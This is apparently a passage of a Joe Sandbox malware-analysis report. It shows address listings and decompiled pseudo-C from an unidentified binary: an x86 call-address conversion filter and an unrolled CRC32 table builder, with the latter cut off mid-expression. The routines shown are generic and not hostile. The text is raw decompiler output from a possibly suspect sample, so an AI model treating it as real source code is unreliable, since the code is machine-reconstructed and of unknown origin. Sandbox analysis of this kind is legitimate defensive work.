                                                                                                                            0x00000000
                                                                                                                            0x00417167
                                                                                                                            0x00417155
                                                                                                                            0x00000000
                                                                                                                            0x0041716b
                                                                                                                            0x00417170
                                                                                                                            0x00417175
                                                                                                                            0x0041717d
                                                                                                                            0x0041717f
                                                                                                                            0x00417181
                                                                                                                            0x00417177
                                                                                                                            0x00417177
                                                                                                                            0x00417179
                                                                                                                            0x00417179
                                                                                                                            0x00417185
                                                                                                                            0x0041718a
                                                                                                                            0x00417190
                                                                                                                            0x00000000
                                                                                                                            0x00417196
                                                                                                                            0x0041719a
                                                                                                                            0x0041719b
                                                                                                                            0x004171a2
                                                                                                                            0x004171b9
                                                                                                                            0x004171bd
                                                                                                                            0x004171c0
                                                                                                                            0x004171c6
                                                                                                                            0x00000000
                                                                                                                            0x004171c8
                                                                                                                            0x004171ca
                                                                                                                            0x00000000
                                                                                                                            0x004171d0
                                                                                                                            0x004171d6
                                                                                                                            0x004171d9
                                                                                                                            0x004171db
                                                                                                                            0x00000000
                                                                                                                            0x004171db
                                                                                                                            0x004171ca
                                                                                                                            0x00000000
                                                                                                                            0x004171dc
                                                                                                                            0x004171dc
                                                                                                                            0x004171e8
                                                                                                                            0x004171ea
                                                                                                                            0x004171ea
                                                                                                                            0x004171ed
                                                                                                                            0x004171f1
                                                                                                                            0x004171f5
                                                                                                                            0x00000000
                                                                                                                            0x004171a4
                                                                                                                            0x004171b0
                                                                                                                            0x004171fd
                                                                                                                            0x004171fd
                                                                                                                            0x00417202
                                                                                                                            0x00417206
                                                                                                                            0x00417210
                                                                                                                            0x00417214
                                                                                                                            0x0041721e
                                                                                                                            0x00000000
                                                                                                                            0x00417220
                                                                                                                            0x00417228
                                                                                                                            0x00000000
                                                                                                                            0x0041722e
                                                                                                                            0x0041722e
                                                                                                                            0x00417238
                                                                                                                            0x0041723b
                                                                                                                            0x0041723d
                                                                                                                            0x0041723e
                                                                                                                            0x00000000
                                                                                                                            0x0041723e
                                                                                                                            0x00417228
                                                                                                                            0x00000000
                                                                                                                            0x00417242
                                                                                                                            0x00417247
                                                                                                                            0x0041724c
                                                                                                                            0x00417256
                                                                                                                            0x00417258
                                                                                                                            0x0041725a
                                                                                                                            0x0041725c
                                                                                                                            0x0041724e
                                                                                                                            0x0041724e
                                                                                                                            0x00417250
                                                                                                                            0x00417252
                                                                                                                            0x00417252
                                                                                                                            0x0041725e
                                                                                                                            0x0041725e
                                                                                                                            0x0041725e
                                                                                                                            0x00000000
                                                                                                                            0x00417264
                                                                                                                            0x004171a2
                                                                                                                            0x00417190
                                                                                                                            0x0041710c
                                                                                                                            0x0041710c
                                                                                                                            0x00000000
                                                                                                                            0x0041710c
                                                                                                                            0x004170cc
                                                                                                                            0x004170d0
                                                                                                                            0x00000000
                                                                                                                            0x004170d6
                                                                                                                            0x004170dc
                                                                                                                            0x004170df
                                                                                                                            0x004170e2
                                                                                                                            0x00000000
                                                                                                                            0x004170e2
                                                                                                                            0x004170d0
                                                                                                                            0x00000000
                                                                                                                            0x004170ca
                                                                                                                            0x004170c4
                                                                                                                            0x00417026
                                                                                                                            0x0041702a
                                                                                                                            0x00000000
                                                                                                                            0x00417030
                                                                                                                            0x00417036
                                                                                                                            0x00417039
                                                                                                                            0x0041703c
                                                                                                                            0x00000000
                                                                                                                            0x0041703c
                                                                                                                            0x0041702a
                                                                                                                            0x00417024
                                                                                                                            0x00416e92
                                                                                                                            0x00416e96
                                                                                                                            0x00000000
                                                                                                                            0x00416e9c
                                                                                                                            0x00416ea2
                                                                                                                            0x00416ea5
                                                                                                                            0x00416ea7
                                                                                                                            0x00416ea8
                                                                                                                            0x00000000
                                                                                                                            0x00416ea8
                                                                                                                            0x00416e96
                                                                                                                            0x00416cf7
                                                                                                                            0x00416cf7
                                                                                                                            0x00416d06
                                                                                                                            0x00416d0a
                                                                                                                            0x00416d12
                                                                                                                            0x00416d17
                                                                                                                            0x00416d19
                                                                                                                            0x00416d19
                                                                                                                            0x00416d4b
                                                                                                                            0x00416d4b
                                                                                                                            0x00416d52
                                                                                                                            0x00416db5
                                                                                                                            0x00416db8
                                                                                                                            0x00416dbd
                                                                                                                            0x00416dc4
                                                                                                                            0x00416dbf
                                                                                                                            0x00416dbf
                                                                                                                            0x00416dbf
                                                                                                                            0x00416dcd
                                                                                                                            0x00416dd1
                                                                                                                            0x00416dd6
                                                                                                                            0x00416de0
                                                                                                                            0x00416de4
                                                                                                                            0x00416de6
                                                                                                                            0x00416de8
                                                                                                                            0x00416dee
                                                                                                                            0x00416df7
                                                                                                                            0x00416e01
                                                                                                                            0x00000000
                                                                                                                            0x00416e03
                                                                                                                            0x00416e03
                                                                                                                            0x00416e0b
                                                                                                                            0x00000000
                                                                                                                            0x00416e11
                                                                                                                            0x00416e17
                                                                                                                            0x00416e1a
                                                                                                                            0x00416e1d
                                                                                                                            0x00000000
                                                                                                                            0x00416e1d
                                                                                                                            0x00416e0b
                                                                                                                            0x00000000
                                                                                                                            0x00416e21
                                                                                                                            0x00416e26
                                                                                                                            0x00416e2d
                                                                                                                            0x00416e39
                                                                                                                            0x00416e3b
                                                                                                                            0x00416e3d
                                                                                                                            0x00416e2f
                                                                                                                            0x00416e2f
                                                                                                                            0x00416e31
                                                                                                                            0x00416e35
                                                                                                                            0x00416e35
                                                                                                                            0x00416e41
                                                                                                                            0x00000000
                                                                                                                            0x00416d54
                                                                                                                            0x00416d54
                                                                                                                            0x00416d60
                                                                                                                            0x00416d64
                                                                                                                            0x00416d6e
                                                                                                                            0x00000000
                                                                                                                            0x00416d70
                                                                                                                            0x00416d70
                                                                                                                            0x00416d78
                                                                                                                            0x00000000
                                                                                                                            0x00416d7e
                                                                                                                            0x00416d84
                                                                                                                            0x00416d87
                                                                                                                            0x00416d8a
                                                                                                                            0x00000000
                                                                                                                            0x00416d8a
                                                                                                                            0x00416d78
                                                                                                                            0x00000000
                                                                                                                            0x00416d8e
                                                                                                                            0x00416d93
                                                                                                                            0x00416d98
                                                                                                                            0x00416da0
                                                                                                                            0x00416da2
                                                                                                                            0x00416da4
                                                                                                                            0x00416d9a
                                                                                                                            0x00416d9a
                                                                                                                            0x00416d9c
                                                                                                                            0x00416d9c
                                                                                                                            0x00416da8
                                                                                                                            0x00416e49
                                                                                                                            0x00416e49
                                                                                                                            0x00416e51
                                                                                                                            0x00416e51
                                                                                                                            0x00416e55
                                                                                                                            0x00416e5b
                                                                                                                            0x00416e72
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00416e5b
                                                                                                                            0x00416d52
                                                                                                                            0x00416cbf
                                                                                                                            0x00416cbf
                                                                                                                            0x00416cc7
                                                                                                                            0x00416cdb
                                                                                                                            0x00416cde
                                                                                                                            0x00416ce1
                                                                                                                            0x00000000
                                                                                                                            0x00416ccc
                                                                                                                            0x00416ccc
                                                                                                                            0x00416cd2
                                                                                                                            0x00416cd2
                                                                                                                            0x00416cc7
                                                                                                                            0x00000000

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b5ab2d6071ba4f626031de446fa0850a734d69f202f19f46ab4dd51ed20a1283
                                                                                                                            • Instruction ID: 749a3237d7bda78a09f8de8b64832c24e1c15a66796a84742980e8518d2f9ae4
                                                                                                                            • Opcode Fuzzy Hash: b5ab2d6071ba4f626031de446fa0850a734d69f202f19f46ab4dd51ed20a1283
                                                                                                                            • Instruction Fuzzy Hash: F9021D72A083118BC709CE28C5802B9BBE2FBC5355F150B2FE49697754D778D8C9CB99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00413ED0 Relevance: .1, Instructions: 143COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00413ED0(intOrPtr __ecx, void* __edx, intOrPtr _a4, unsigned int* _a8, intOrPtr _a12) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _t43;
				unsigned int _t44;
				signed int _t48;
				intOrPtr _t52;
				signed char _t63;
				signed int _t64;
				signed char _t77;
				signed int* _t81;
				unsigned int _t84;
				void* _t86;
				unsigned int _t88;
				signed int _t91;
				intOrPtr _t97;
				void* _t98;

				_t97 = __ecx;
				_t84 = 0;
				_t88 =  *_a8 & 0x00000007;
				_v8 = __ecx;
				if(__edx >= 5) {
					_a4 = _a4 + 5;
					_t52 = __edx - 4 + __ecx;
					_v4 = _t52;
					while(1) {
						_t81 = _t84 + _t97;
						if(_t81 >= _t52) {
							goto L7;
						}
						L5:
						while(( *_t81 & 0x000000fe) != 0xe8) {
							_t81 =  &(_t81[0]);
							if(_t81 < _t52) {
								continue;
							}
							goto L7;
						}
						L7:
						_t63 = _t81 - _t84 - _t97;
						_t86 = _t81 - _t97;
						if(_t81 < _t52) {
							if(_t63 <= 2) {
								_t91 = _t88 >> _t63;
								if(_t91 == 0 || _t91 <= 4 && _t91 != 3 && ((( &(_t81[0]))[_t91 >> 1] & 0x000000ff) + 0x00000001 & 0x000000fe) != 0) {
									goto L10;
								} else {
									_t88 = (_t91 | 0x00000008) >> 1;
									_t84 = _t86 + 1;
									continue;
								}
							} else {
								_t91 = 0;
								L10:
								_t64 = _t81[1] & 0x000000ff;
								if((_t64 + 0x00000001 & 0x000000fe) != 0) {
									_t97 = _v8;
									_t88 = (_t91 | 0x00000008) >> 1;
									_t84 = _t86 + 1;
								} else {
									_t43 = _t81[0] & 0x000000ff | ((_t64 << 0x00000008 | _t81[0] & 0x000000ff) << 0x00000008 | _t81[0] & 0x000000ff) << 0x00000008;
									_t98 = _t86 + _a4;
									_t84 = _t86 + 5;
									if(_a12 == 0) {
										_t44 = _t43 - _t98;
									} else {
										_t44 = _t43 + _t98;
									}
									if(_t91 != 0) {
										_t77 = (_t91 & 0x00000006) + (_t91 & 0x00000006) + (_t91 & 0x00000006) + (_t91 & 0x00000006);
										if(((_t44 >> _t77) + 0x00000001 & 0x000000fe) == 0) {
											_t48 = _t44 ^ (0x00000100 << _t77) - 0x00000001;
											if(_a12 == 0) {
												_t44 = _t48 - _t98;
											} else {
												_t44 = _t48 + _t98;
											}
										}
										_t52 = _v4;
										_t88 = 0;
									}
									_t97 = _v8;
									_t81[0] = _t44;
									_t81[0] = _t44 >> 8;
									_t81[0] = _t44 >> 0x10;
									_t81[1] =  ~(_t44 >> 0x00000018 & 0x00000001);
								}
								while(1) {
									_t81 = _t84 + _t97;
									if(_t81 >= _t52) {
										goto L7;
									}
									goto L5;
								}
							}
						}
						if(_t63 <= 2) {
							 *_a8 = _t88 >> _t63;
							return _t86;
						} else {
							 *_a8 = 0;
							return _t86;
						}
						goto L30;
					}
				} else {
					return 0;
				}
				L30:
			}



















                                                                                                                            0x00413edc
                                                                                                                            0x00413ede
                                                                                                                            0x00413ee0
                                                                                                                            0x00413ee3
                                                                                                                            0x00413eea
                                                                                                                            0x00413ef7
                                                                                                                            0x00413f00
                                                                                                                            0x00413f02
                                                                                                                            0x00413f06
                                                                                                                            0x00413f06
                                                                                                                            0x00413f0b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00413f10
                                                                                                                            0x00413f1a
                                                                                                                            0x00413f1d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00413f1d
                                                                                                                            0x00413f1f
                                                                                                                            0x00413f25
                                                                                                                            0x00413f27
                                                                                                                            0x00413f2b
                                                                                                                            0x00413f34
                                                                                                                            0x00413f77
                                                                                                                            0x00413f7b
                                                                                                                            0x00000000
                                                                                                                            0x00413f95
                                                                                                                            0x00413f98
                                                                                                                            0x00413f9a
                                                                                                                            0x00000000
                                                                                                                            0x00413f9a
                                                                                                                            0x00413f36
                                                                                                                            0x00413f36
                                                                                                                            0x00413f38
                                                                                                                            0x00413f38
                                                                                                                            0x00413f41
                                                                                                                            0x00413ffc
                                                                                                                            0x00414003
                                                                                                                            0x00414005
                                                                                                                            0x00413f47
                                                                                                                            0x00413f60
                                                                                                                            0x00413f66
                                                                                                                            0x00413f69
                                                                                                                            0x00413f71
                                                                                                                            0x00413fa0
                                                                                                                            0x00413f73
                                                                                                                            0x00413f73
                                                                                                                            0x00413f73
                                                                                                                            0x00413fa4
                                                                                                                            0x00413faf
                                                                                                                            0x00413fb7
                                                                                                                            0x00413fc1
                                                                                                                            0x00413fc8
                                                                                                                            0x00413fce
                                                                                                                            0x00413fca
                                                                                                                            0x00413fca
                                                                                                                            0x00413fca
                                                                                                                            0x00413fc8
                                                                                                                            0x00413fd0
                                                                                                                            0x00413fd4
                                                                                                                            0x00413fd4
                                                                                                                            0x00413fd6
                                                                                                                            0x00413fdf
                                                                                                                            0x00413fe2
                                                                                                                            0x00413ff1
                                                                                                                            0x00413ff4
                                                                                                                            0x00413ff4
                                                                                                                            0x00413f06
                                                                                                                            0x00413f06
                                                                                                                            0x00413f0b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00413f0b
                                                                                                                            0x00413f06
                                                                                                                            0x00413f34
                                                                                                                            0x0041400f
                                                                                                                            0x0041402d
                                                                                                                            0x00414034
                                                                                                                            0x00414011
                                                                                                                            0x0041401a
                                                                                                                            0x00414021
                                                                                                                            0x00414021
                                                                                                                            0x00000000
                                                                                                                            0x0041400f
                                                                                                                            0x00413eee
                                                                                                                            0x00413ef4
                                                                                                                            0x00413ef4
                                                                                                                            0x00000000

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b31d452cf4fc038398579975b7917bb1ff375609163340ad82824380036c8528
                                                                                                                            • Instruction ID: c73478d6d2dc94b6e0038562b2afcca53e437786cb5e4ec297cf3cc6dfcd3039
                                                                                                                            • Opcode Fuzzy Hash: b31d452cf4fc038398579975b7917bb1ff375609163340ad82824380036c8528
                                                                                                                            • Instruction Fuzzy Hash: F1416833E043224BC7148E1C48942BAFBA1ABD1326F09476FD99687381D2249E8EC3D5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403101 Relevance: .1, Instructions: 97COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00403101() {
				void* _t43;
				void* _t45;
				unsigned int _t83;
				void* _t84;

				_t83 = 0;
				do {
					 *(0x41f3e0 + _t83 * 4) =  ~(( ~(( ~(( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 